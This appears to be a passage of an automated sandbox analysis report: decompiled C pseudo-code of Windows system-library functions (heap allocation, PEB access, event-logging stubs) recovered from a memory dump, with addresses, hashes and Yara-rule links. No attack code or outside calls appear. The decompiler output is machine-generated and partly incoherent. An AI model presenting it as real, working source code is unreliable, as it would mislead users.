					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E048FB640(E048F9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                                            0x0494fe96
                                                            0x0494fe9e
                                                            0x0494fea1
                                                            0x0494fead
                                                            0x0494feb3
                                                            0x0494feb9
                                                            0x0494fec3
                                                            0x0494fed5
                                                            0x0494fec5
                                                            0x0494fece
                                                            0x0494fece
                                                            0x0494fee0
                                                            0x0494fee1
                                                            0x0494fee3
                                                            0x0494fee8
                                                            0x0494fefb

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c22561fc02cdc6fc558b985dacaa12aae5d11836edac9829c75dae12404546a5
                                                            • Instruction ID: ffeee8c42cc0d1e8aa513abffc5a59e34df9026cfcdf6931fdb2c6460e2ba8dc
                                                            • Opcode Fuzzy Hash: c22561fc02cdc6fc558b985dacaa12aae5d11836edac9829c75dae12404546a5
                                                            • Instruction Fuzzy Hash: EC016270A00209EFCB14DFA8D545A6EB7F4EF04304F104569E505DB382DA75EA11CB81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0497131B, Relevance: .0, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 48%
                                                            			E0497131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x49ad360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E048D7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E048FB640(E048F9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                            0x0497131b
                                                            0x0497132a
                                                            0x04971330
                                                            0x04971336
                                                            0x0497133e
                                                            0x04971341
                                                            0x04971344
                                                            0x0497134f
                                                            0x04971361
                                                            0x04971351
                                                            0x0497135a
                                                            0x0497135a
                                                            0x0497136c
                                                            0x0497136d
                                                            0x0497136f
                                                            0x04971374
                                                            0x04971387

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0020e492a45183a6391a418bea449dd5e493adf0948ee59b472825e4139a0855
                                                            • Instruction ID: 0afc5bb0ef27419e77b27ce1f1e22daaa8aa1e8d9677dd78867546e4d7ddc6da
                                                            • Opcode Fuzzy Hash: 0020e492a45183a6391a418bea449dd5e493adf0948ee59b472825e4139a0855
                                                            • Instruction Fuzzy Hash: 77013171E01248EFDB04EFA9D545AAEB7F4FF08700F404569F945EB341E674AA10CB55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04988F6A, Relevance: .0, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 48%
                                                            			E04988F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x49ad360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E048D7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E048FB640(E048F9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                            0x04988f6a
                                                            0x04988f79
                                                            0x04988f81
                                                            0x04988f84
                                                            0x04988f8b
                                                            0x04988f91
                                                            0x04988f94
                                                            0x04988f9e
                                                            0x04988fb0
                                                            0x04988fa0
                                                            0x04988fa9
                                                            0x04988fa9
                                                            0x04988fbb
                                                            0x04988fbc
                                                            0x04988fbe
                                                            0x04988fc3
                                                            0x04988fd6

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5b7779886cfc63af6b9909237b0fd87a10f22651e0e875c6cb8efc9b71ac4aed
                                                            • Instruction ID: 03b75c2a294e71b32fa1aa42d29e362ba9298b94d03944ac1ab35c5b84764bae
                                                            • Opcode Fuzzy Hash: 5b7779886cfc63af6b9909237b0fd87a10f22651e0e875c6cb8efc9b71ac4aed
                                                            • Instruction Fuzzy Hash: 4B013674A012089FD704EF6CD545A5EB7B4EF08304F504569F905EB341DA78EA10CB95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048DC577, Relevance: .0, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E048DC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E048DC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x48911cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E049888F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                            0x048dc577
                                                            0x048dc57d
                                                            0x048dc581
                                                            0x048dc5b5
                                                            0x048dc5b9
                                                            0x048dc5ce
                                                            0x048dc5ce
                                                            0x048dc5ca
                                                            0x00000000
                                                            0x048dc5ca
                                                            0x048dc5c4
                                                            0x048dc5c8
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x048dc5ad
                                                            0x00000000
                                                            0x048dc5af

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 22e6d9a882c5b8064dc8d57c1b58f93bb50f153d8cec053daae83f749b0937b7
                                                            • Instruction ID: 38544cb4f9fe5d6f16c449b91421e8b498ca48a528550cf90dae5e0e69cb2294
                                                            • Opcode Fuzzy Hash: 22e6d9a882c5b8064dc8d57c1b58f93bb50f153d8cec053daae83f749b0937b7
                                                            • Instruction Fuzzy Hash: 54F09AB29176949EE732EF288104B227FF9BB05774F588F6AD416C7201C6A4F880C251
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04972073, Relevance: .0, Instructions: 32COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 94%
                                                            			E04972073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0496FD22(__ecx);
				_t19 =  *0x49a849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x49a8748; // 0x0
					if(__eflags <= 0) {
						E04971C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x49a8724 & 0x00000004;
							if(( *0x49a8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x49a8724; // 0x0
					return E04968DF1(__ebx, 0xc0000374, 0x49a5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                            0x04972076
                                                            0x04972078
                                                            0x0497207d
                                                            0x04972083
                                                            0x049720a4
                                                            0x049720aa
                                                            0x049720ac
                                                            0x049720b7
                                                            0x049720ba
                                                            0x049720bc
                                                            0x049720c9
                                                            0x049720c9
                                                            0x049720d0
                                                            0x049720d2
                                                            0x00000000
                                                            0x049720d2
                                                            0x049720be
                                                            0x049720c3
                                                            0x049720c5
                                                            0x049720c7
                                                            0x00000000
                                                            0x00000000
                                                            0x049720c7
                                                            0x049720bc
                                                            0x049720d4
                                                            0x04972085
                                                            0x04972085
                                                            0x049720a3
                                                            0x049720a3

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6b3c17256b780aa7eb32bdb3fe4658547b4329a8e3c7ed8f96de9fcb12c63f1d
                                                            • Instruction ID: 5f989c28afc437da374d783a3aaece441608e3bcb517538a7c8f4959d748cac7
                                                            • Opcode Fuzzy Hash: 6b3c17256b780aa7eb32bdb3fe4658547b4329a8e3c7ed8f96de9fcb12c63f1d
                                                            • Instruction Fuzzy Hash: DCF0A06A93A2944AEF32BF2975112E13FD8EBC5218B0A04F5D59017204C538ADA3CBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04988D34, Relevance: .0, Instructions: 32COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 43%
                                                            			E04988D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x49ad360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E048D7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E048FB640(E048F9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                            0x04988d34
                                                            0x04988d43
                                                            0x04988d4b
                                                            0x04988d4e
                                                            0x04988d52
                                                            0x04988d5c
                                                            0x04988d6e
                                                            0x04988d5e
                                                            0x04988d67
                                                            0x04988d67
                                                            0x04988d79
                                                            0x04988d7a
                                                            0x04988d7c
                                                            0x04988d81
                                                            0x04988d94

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ad47eed19a229a545aed83928a280540d6f1e78c825e419755efbadd898494f9
                                                            • Instruction ID: e8f0632c8265012c978d93081f9e991b5fa76d9554ca5aa97a78aabc178d8a4e
                                                            • Opcode Fuzzy Hash: ad47eed19a229a545aed83928a280540d6f1e78c825e419755efbadd898494f9
                                                            • Instruction Fuzzy Hash: F6F0B470E046089FDB04FFBCD441B6E77B4EF04304F5085A9E906EB280EA78E900CB95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048F927A, Relevance: .0, Instructions: 32COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 54%
                                                            			E048F927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L048D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E048FFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E048F92C6(_t11, _t14);
				}
				return _t11;
			}





                                                            0x048f9295
                                                            0x048f9299
                                                            0x048f929f
                                                            0x048f92aa
                                                            0x048f92ad
                                                            0x048f92ae
                                                            0x048f92af
                                                            0x048f92b0
                                                            0x048f92b4
                                                            0x048f92bb
                                                            0x048f92bb
                                                            0x048f92c5

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                            • Instruction ID: b01cc9da0c42de120772f6853a3005d251d1c98cdd45d3ba1236902bfd8bb469
                                                            • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                            • Instruction Fuzzy Hash: 2EE0E5722405002BE7119F49DC80B033759AF82724F004579F6009E242C6F5E80887A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04988CD6, Relevance: .0, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 36%
                                                            			E04988CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x49ad360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E048D7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E048FB640(E048F9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                            0x04988ce5
                                                            0x04988ced
                                                            0x04988cf0
                                                            0x04988cfb
                                                            0x04988d0d
                                                            0x04988cfd
                                                            0x04988d06
                                                            0x04988d06
                                                            0x04988d18
                                                            0x04988d19
                                                            0x04988d1b
                                                            0x04988d20
                                                            0x04988d33

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7db02d306f9239e93b7f1d57784797ee865addf05962cba45601a2cdc5a31ae1
                                                            • Instruction ID: f88abfdc47c6a674b926c548233bd4ad9e32797659b25ca3e0af58404703bfbc
                                                            • Opcode Fuzzy Hash: 7db02d306f9239e93b7f1d57784797ee865addf05962cba45601a2cdc5a31ae1
                                                            • Instruction Fuzzy Hash: F7F0E270A05208ABDB04EBACD845E6E77B8EF08304F5006A9E906EB280EA38E900C755
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048D746D, Relevance: .0, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 88%
                                                            			E048D746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E048CEB70(__ecx, 0x49a79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E048F95D0();
							L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                            0x048d746d
                                                            0x048d746d
                                                            0x048d746d
                                                            0x048d7471
                                                            0x048d7488
                                                            0x0491f92d
                                                            0x048d748e
                                                            0x048d7491
                                                            0x048d7495
                                                            0x0491f937
                                                            0x0491f93a
                                                            0x0491f94e
                                                            0x0491f953
                                                            0x0491f956
                                                            0x0491f956
                                                            0x048d7495
                                                            0x00000000
                                                            0x048d7488
                                                            0x048d7473
                                                            0x048d7478
                                                            0x048d747d
                                                            0x048d7481
                                                            0x00000000
                                                            0x048d7481
                                                            0x048d747d
                                                            0x048d747a
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8fe40a279b11deb78a3fb9ab16b193d8aca04c5baced283549b8cff7a2333817
                                                            • Instruction ID: dbf22c7f313c07517f5525abd6e0c128bbbd9437cf9bfaa0a905a43f3f058db0
                                                            • Opcode Fuzzy Hash: 8fe40a279b11deb78a3fb9ab16b193d8aca04c5baced283549b8cff7a2333817
                                                            • Instruction Fuzzy Hash: 71F0543560614CAADF129B6CC850B79BB63AF04358F540F65D451EB160F765F8018BD6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048B4F2E, Relevance: .0, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E048B4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E049888F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E048DC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x4891030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                                            0x048b4f2e
                                                            0x048b4f34
                                                            0x048b4f38
                                                            0x04910b85
                                                            0x04910b85
                                                            0x04910b89
                                                            0x04910b9a
                                                            0x04910b9a
                                                            0x04910b9f
                                                            0x00000000
                                                            0x04910b9f
                                                            0x04910b94
                                                            0x04910b98
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04910b98
                                                            0x048b4f3e
                                                            0x048b4f48
                                                            0x00000000
                                                            0x048b4f6e
                                                            0x00000000
                                                            0x048b4f70

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ed730f3e3d370d7ea25dc3446fe77f8365155dcac7374421687d6708bb985876
                                                            • Instruction ID: 610621b8ba3abe18e14aa1131465d51516a206830e77ff51c128728f12b7dc11
                                                            • Opcode Fuzzy Hash: ed730f3e3d370d7ea25dc3446fe77f8365155dcac7374421687d6708bb985876
                                                            • Instruction Fuzzy Hash: 3FF0BE725A669C9FEB61DB18C144F26B7E8AB007B8F444976D40587E35C765FC84C680
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04988B58, Relevance: .0, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 36%
                                                            			E04988B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x49ad360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E048D7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E048FB640(E048F9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                            0x04988b67
                                                            0x04988b6f
                                                            0x04988b72
                                                            0x04988b7d
                                                            0x04988b8f
                                                            0x04988b7f
                                                            0x04988b88
                                                            0x04988b88
                                                            0x04988b9a
                                                            0x04988b9b
                                                            0x04988b9d
                                                            0x04988ba2
                                                            0x04988bb5

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c1726b00ce73223fed28d0b752270c4e95be533229685effcee04d478151039d
                                                            • Instruction ID: 89e62a9f032ca4d3d328e92981a6bd9e361b5166c058608d0d646463036d934e
                                                            • Opcode Fuzzy Hash: c1726b00ce73223fed28d0b752270c4e95be533229685effcee04d478151039d
                                                            • Instruction Fuzzy Hash: 2EF05EB0A15258AFEB04FBACD906A7E77A8EF44304F440969AA05DB280EA74E910C795
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048EA44B, Relevance: .0, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E048EA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x49a7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L048D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E048FFA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                                            0x048ea44b
                                                            0x048ea453
                                                            0x048ea472
                                                            0x048ea476
                                                            0x00000000
                                                            0x048ea493
                                                            0x048ea47a
                                                            0x048ea47f
                                                            0x048ea486
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 85b4431dac68ec8b0b5fb65c427e60d651c939de9ac7fc94f855853e673fb1a2
                                                            • Instruction ID: 981fd6f4b3ba3b05176b445ded0d6f7264dfdcb7603ea9459cdba88592865792
                                                            • Opcode Fuzzy Hash: 85b4431dac68ec8b0b5fb65c427e60d651c939de9ac7fc94f855853e673fb1a2
                                                            • Instruction Fuzzy Hash: 49E02272A01421ABE2124B08BC00F76739DDBD1A08F0A0935E604E7210D668ED11C7E0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048BF358, Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 79%
                                                            			E048BF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E048EF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L048D4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                            0x048bf35d
                                                            0x048bf361
                                                            0x048bf367
                                                            0x048bf372
                                                            0x048bf38c
                                                            0x048bf38c
                                                            0x048bf394

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                            • Instruction ID: a3a81717c507080bf3a62b92180c6ecd22a78f7bbc94b527a830308045eaffe0
                                                            • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                            • Instruction Fuzzy Hash: EEE0D832A41218BFDB3196DD9D05FAABBACDB48B60F000655BB04D7150D571AD00C7D1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048CFF60, Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E048CFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x48911a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E049888F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E048D0050(_t14);
				}
			}










                                                            0x048cff66
                                                            0x048cff6b
                                                            0x00000000
                                                            0x048cff8f
                                                            0x00000000
                                                            0x048cff8f

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: df5115e5e08d4bce59aec26553ee47579a2c106c8ea14e4aed61dc65e04e35b1
                                                            • Instruction ID: 9015bb271554de2d413517b33eb7879faf46dabd58e78931cd8a1c35bf756ba3
                                                            • Opcode Fuzzy Hash: df5115e5e08d4bce59aec26553ee47579a2c106c8ea14e4aed61dc65e04e35b1
                                                            • Instruction Fuzzy Hash: 6EE0D8B12152049FF735EB55D044F253799DB42729F198E1DEB08C7181CE31F940C216
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 049441E8, Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 82%
                                                            			E049441E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
